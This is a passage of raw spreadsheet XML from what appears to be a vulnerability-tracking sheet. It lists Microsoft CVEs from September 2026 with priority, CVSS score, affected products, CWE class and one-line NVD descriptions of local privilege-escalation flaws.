t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B999" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C999" s="5" t="inlineStr"><is><t>CVE-2026-70585</t></is></c><c r="D999" s="5" t="n"><v>7</v></c><c r="E999" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F999" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G999" s="5" t="inlineStr" /><c r="H999" s="5" t="n"><v>0.003</v></c><c r="I999" s="5" t="inlineStr" /><c r="J999" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K999" s="5" t="inlineStr"><is><t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L999" s="5" t="inlineStr" /><c r="M999" s="5" t="inlineStr" /><c r="N999" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O999" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P999" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q999" s="5" t="inlineStr" /><c r="R999" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S999" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T999" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70585</t></is></c></row><row r="1000"><c r="A1000" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1000" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1000" s="5" t="inlineStr"><is><t>CVE-2026-71332</t></is></c><c r="D1000" s="5" t="n"><v>7</v></c><c r="E1000" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1000" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1000" s="5" t="inlineStr" /><c r="H1000" s="5" t="n"><v>0.003</v></c><c r="I1000" s="5" t="inlineStr" /><c r="J1000" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K100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00" s="5" t="inlineStr" /><c r="M1000" s="5" t="inlineStr" /><c r="N1000" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1000" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1000" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1000" s="5" t="inlineStr" /><c r="R1000" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1000" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1000" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71332</t></is></c></row><row r="1001"><c r="A1001" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1001" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1001" s="5" t="inlineStr"><is><t>CVE-2026-71333</t></is></c><c r="D1001" s="5" t="n"><v>7</v></c><c r="E1001" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1001" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1001" s="5" t="inlineStr" /><c r="H1001" s="5" t="n"><v>0.003</v></c><c r="I1001" s="5" t="inlineStr" /><c r="J1001" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K100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01" s="5" t="inlineStr" /><c r="M1001" s="5" t="inlineStr" /><c r="N1001" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1001" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1001" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1001" s="5" t="inlineStr" /><c r="R1001" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1001" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1001" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71333</t></is></c></row><row r="1002"><c r="A1002" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1002" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1002" s="5" t="inlineStr"><is><t>CVE-2026-71340</t></is></c><c r="D1002" s="5" t="n"><v>7</v></c><c r="E1002" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1002" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1002" s="5" t="inlineStr" /><c r="H1002" s="5" t="n"><v>0.003</v></c><c r="I1002" s="5" t="inlineStr" /><c r="J1002" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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02" s="5" t="inlineStr" /><c r="M1002" s="5" t="inlineStr" /><c r="N1002" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1002" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1002" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1002" s="5" t="inlineStr" /><c r="R1002" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1002" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1002" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71340</t></is></c></row><row r="1003"><c r="A1003" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1003" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1003" s="5" t="inlineStr"><is><t>CVE-2026-71342</t></is></c><c r="D1003" s="5" t="n"><v>7</v></c><c r="E1003" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1003" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1003" s="5" t="inlineStr" /><c r="H1003" s="5" t="n"><v>0.002</v></c><c r="I1003" s="5" t="inlineStr" /><c r="J1003" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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03" s="5" t="inlineStr" /><c r="M1003" s="5" t="inlineStr" /><c r="N1003" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1003" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1003" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1003" s="5" t="inlineStr" /><c r="R1003" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1003" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1003" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71342</t></is></c></row><row r="1004"><c r="A1004" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1004" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1004" s="5" t="inlineStr"><is><t>CVE-2026-71351</t></is></c><c r="D1004" s="5" t="n"><v>7</v></c><c r="E1004" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1004" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1004" s="5" t="inlineStr" /><c r="H1004" s="5" t="n"><v>0.003</v></c><c r="I1004" s="5" t="inlineStr" /><c r="J1004" s="5" t="inlineStr" /><c r="K1004" s="5" t="inlineStr" /><c r="L1004" s="5" t="inlineStr" /><c r="M1004" s="5" t="inlineStr" /><c r="N1004" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1004" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1004" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1004" s="5" t="inlineStr" /><c r="R1004" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1004" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1004" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71351</t></is></c></row><row r="1005"><c r="A1005" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1005" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1005" s="5" t="inlineStr"><is><t>CVE-2026-71353</t></is></c><c r="D1005" s="5" t="n"><v>7</v></c><c r="E1005" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1005" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1005" s="5" t="inlineStr" /><c r="H1005" s="5" t="n"><v>0.002</v></c><c r="I1005" s="5" t="inlineStr" /><c r="J1005" s="5" t="inlineStr" /><c r="K1005" s="5" t="inlineStr" /><c r="L1005" s="5" t="inlineStr" /><c r="M1005" s="5" t="inlineStr" /><c r="N1005" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1005" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1005" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1005" s="5" t="inlineStr" /><c r="R1005" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S1005" s="5" t="inlineStr"><is><t>Double free in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1005" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71353</t></is></c></row><row r="1006"><c r="A1006" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1006" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1006" s="5" t="inlineStr"><is><t>CVE-2026-72926</t></is></c><c r="D1006" s="5" t="n"><v>7</v></c><c r="E1006" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1006" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1006" s="5" t="inlineStr" /><c r="H1006" s="5" t="n"><v>0.003</v></c><c r="I1006" s="5" t="inlineStr" /><c r="J1006" s="5" t="inlineStr" /><c r="K1006" s="5" t="inlineStr" /><c r="L1006" s="5" t="inlineStr" /><c r="M1006" s="5" t="inlineStr" /><c r="N1006" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1006" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1006" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1006" s="5" t="inlineStr" /><c r="R1006" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1006" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1006" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72926</t></is></c></row><row r="1007"><c r="A1007" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1007" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1007" s="5" t="inlineStr"><is><t>CVE-2026-72930</t></is></c><c r="D1007" s="5" t="n"><v>7</v></c><c r="E1007" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1007" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1007" s="5" t="inlineStr" /><c r="H1007" s="5" t="n"><v>0.003</v></c><c r="I1007" s="5" t="inlineStr" /><c r="J1007" s="5" t="inlineStr" /><c r="K1007" s="5" t="inlineStr" /><c r="L1007" s="5" t="inlineStr" /><c r="M1007" s="5" t="inlineStr" /><c r="N1007" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1007" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1007" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1007" s="5" t="inlineStr" /><c r="R1007" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1007" s="5" t="inlineStr"><is><t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to execute code locally.</t></is></c><c r="T1007" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72930</t></is></c></row><row r="1008"><c r="A1008" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1008" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1008" s="5" t="inlineStr"><is><t>CVE-2026-72952</t></is></c><c r="D1008" s="5" t="n"><v>7</v></c><c r="E1008" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1008" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1008" s="5" t="inlineStr" /><c r="H1008" s="5" t="n"><v>0.003</v></c><c r="I1008" s="5" t="inlineStr" /><c r="J1008" s="5" t="inlineStr" /><c r="K1008" s="5" t="inlineStr" /><c r="L1008" s="5" t="inlineStr" /><c r="M1008" s="5" t="inlineStr" /><c r="N1008" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1008" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1008" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1008" s="5" t="inlineStr" /><c r="R1008" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1008" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T1008" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72952</t></is></c></row><row r="1009"><c r="A1009" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1009" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1009" s="5" t="inlineStr"><is><t>CVE-2026-72963</t></is></c><c r="D1009" s="5" t="n"><v>7</v></c><c r="E1009" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1009" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1009" s="5" t="inlineStr" /><c r="H1009" s="5" t="n"><v>0.003</v></c><c r="I1009" s="5" t="inlineStr" /><c r="J1009" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K100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09" s="5" t="inlineStr" /><c r="M1009" s="5" t="inlineStr" /><c r="N1009" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1009" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1009" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1009" s="5" t="inlineStr" /><c r="R1009" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1009" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Execution Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1009" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72963</t></is></c></row><row r="1010"><c r="A1010" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1010" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1010" s="5" t="inlineStr"><is><t>CVE-2026-73003</t></is></c><c r="D1010" s="5" t="n"><v>7</v></c><c r="E1010" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1010" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1010" s="5" t="inlineStr" /><c r="H1010" s="5" t="n"><v>0.002</v></c><c r="I1010" s="5" t="inlineStr" /><c r="J1010" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1010"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10" s="5" t="inlineStr" /><c r="M1010" s="5" t="inlineStr" /><c r="N1010" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1010" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1010" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1010" s="5" t="inlineStr" /><c r="R1010" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1010" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1010" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73003</t></is></c></row><row r="1011"><c r="A1011" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1011" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1011" s="5" t="inlineStr"><is><t>CVE-2026-73005</t></is></c><c r="D1011" s="5" t="n"><v>7</v></c><c r="E1011" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1011" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1011" s="5" t="inlineStr" /><c r="H1011" s="5" t="n"><v>0.002</v></c><c r="I1011" s="5" t="inlineStr" /><c r="J1011" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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11" s="5" t="inlineStr" /><c r="M1011" s="5" t="inlineStr" /><c r="N1011" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1011" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1011" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1011" s="5" t="inlineStr" /><c r="R1011" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1011" s="5" t="inlineStr"><is><t>Use after free in Windows Authentication Methods allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1011" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73005</t></is></c></row><row r="1012"><c r="A1012" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1012" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1012" s="5" t="inlineStr"><is><t>CVE-2026-73022</t></is></c><c r="D1012" s="5" t="n"><v>7</v></c><c r="E1012" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1012" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1012" s="5" t="inlineStr" /><c r="H1012" s="5" t="n"><v>0.002</v></c><c r="I1012" s="5" t="inlineStr" /><c r="J1012" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1012"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12" s="5" t="inlineStr" /><c r="M1012" s="5" t="inlineStr" /><c r="N1012" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1012" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1012" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1012" s="5" t="inlineStr" /><c r="R1012" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1012" s="5" t="inlineStr"><is><t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1012" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73022</t></is></c></row><row r="1013"><c r="A1013" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1013" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1013" s="5" t="inlineStr"><is><t>CVE-2026-77485</t></is></c><c r="D1013" s="5" t="n"><v>7</v></c><c r="E1013" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1013" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1013" s="5" t="inlineStr" /><c r="H1013" s="5" t="n"><v>0.002</v></c><c r="I1013" s="5" t="inlineStr" /><c r="J1013" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1013" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1013" s="5" t="inlineStr" /><c r="M1013" s="5" t="inlineStr" /><c r="N1013" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1013" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1013" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1013" s="5" t="inlineStr" /><c r="R1013" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1013" s="5" t="inlineStr"><is><t>Use after free in SQL Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1013" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77485</t></is></c></row><row r="1014"><c r="A1014" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1014" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1014" s="5" t="inlineStr"><is><t>CVE-2026-77894</t></is></c><c r="D1014" s="5" t="n"><v>7</v></c><c r="E1014" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1014" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1014" s="5" t="inlineStr" /><c r="H1014" s="5" t="n"><v>0.002</v></c><c r="I1014" s="5" t="inlineStr" /><c r="J1014" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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14" s="5" t="inlineStr" /><c r="M1014" s="5" t="inlineStr" /><c r="N1014" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1014" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1014" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1014" s="5" t="inlineStr" /><c r="R1014" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S1014" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1014" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77894</t></is></c></row><row r="1015"><c r="A1015" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1015" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1015" s="5" t="inlineStr"><is><t>CVE-2026-77897</t></is></c><c r="D1015" s="5" t="n"><v>7</v></c><c r="E1015" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1015" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1015" s="5" t="inlineStr" /><c r="H1015" s="5" t="n"><v>0.003</v></c><c r="I1015" s="5" t="inlineStr" /><c r="J1015" s="5" t="inlineStr" /><c r="K1015" s="5" t="inlineStr" /><c r="L1015" s="5" t="inlineStr" /><c r="M1015" s="5" t="inlineStr" /><c r="N1015" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1015" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1015" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1015" s="5" t="inlineStr" /><c r="R1015" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1015" s="5" t="inlineStr"><is><t>Relative path traversal in Power Automate allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1015" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77897</t></is></c></row><row r="1016"><c r="A1016" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1016" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1016" s="5" t="inlineStr"><is><t>CVE-2026-77899</t></is></c><c r="D1016" s="5" t="n"><v>7</v></c><c r="E1016" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1016" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1016" s="5" t="inlineStr" /><c r="H1016" s="5" t="n"><v>0.002</v></c><c r="I1016" s="5" t="inlineStr" /><c r="J1016" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1016" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2012</t></is></c><c r="L1016" s="5" t="inlineStr" /><c r="M1016" s="5" t="inlineStr" /><c r="N1016" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1016" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1016" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1016" s="5" t="inlineStr" /><c r="R1016" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1016" s="5" t="inlineStr"><is><t>Use after free in Windows Security Center allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1016" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77899</t></is></c></row><row r="1017"><c r="A1017" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1017" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1017" s="5" t="inlineStr"><is><t>CVE-2026-77905</t></is></c><c r="D1017" s="5" t="n"><v>7</v></c><c r="E1017" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1017" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1017" s="5" t="inlineStr" /><c r="H1017" s="5" t="n"><v>0.002</v></c><c r="I1017" s="5" t="inlineStr" /><c r="J1017" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K101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17" s="5" t="inlineStr" /><c r="M1017" s="5" t="inlineStr" /><c r="N1017" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1017" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1017" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1017" s="5" t="inlineStr" /><c r="R1017" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1017" s="5" t="inlineStr"><is><t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1017" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t></is></c></row><row r="1018"><c r="A1018" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1018" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1018" s="5" t="inlineStr"><is><t>CVE-2026-78457</t></is></c><c r="D1018" s="5" t="n"><v>7</v></c><c r="E1018" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1018" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1018" s="5" t="inlineStr" /><c r="H1018" s="5" t="n"><v>0.002</v></c><c r="I1018" s="5" t="inlineStr" /><c r="J1018" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1018" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1018" s="5" t="inlineStr" /><c r="M1018" s="5" t="inlineStr" /><c r="N1018" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1018" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1018" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1018" s="5" t="inlineStr" /><c r="R1018" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1018" s="5" t="inlineStr"><is><t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1018" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t></is></c></row><row r="1019"><c r="A1019" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1019" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1019" s="5" t="inlineStr"><is><t>CVE-2026-78464</t></is></c><c r="D1019" s="5" t="n"><v>7</v></c><c r="E1019" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1019" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1019" s="5" t="inlineStr" /><c r="H1019" s="5" t="n"><v>0.002</v></c><c r="I1019" s="5" t="inlineStr" /><c r="J1019" s="5" t="inlineStr" /><c r="K1019" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1019" s="5" t="inlineStr" /><c r="M1019" s="5" t="inlineStr" /><c r="N1019" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1019" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1019" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1019" s="5" t="inlineStr" /><c r="R1019" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1019" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T1019" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t></is></c></row><row r="1020"><c r="A1020" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1020" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1020" s="5" t="inlineStr"><is><t>CVE-2026-80093</t></is></c><c r="D1020" s="5" t="n"><v>7</v></c><c r="E1020" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1020" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1020" s="5" t="inlineStr" /><c r="H1020" s="5" t="n"><v>0.003</v></c><c r="I1020" s="5" t="inlineStr" /><c r="J1020" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1020"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20" s="5" t="inlineStr" /><c r="M1020" s="5" t="inlineStr" /><c r="N1020" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1020" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1020" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1020" s="5" t="inlineStr" /><c r="R1020" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1020" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T1020" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t></is></c></row><row r="1021"><c r="A1021" s="5" t="inlineStr"><is><t>P3 - 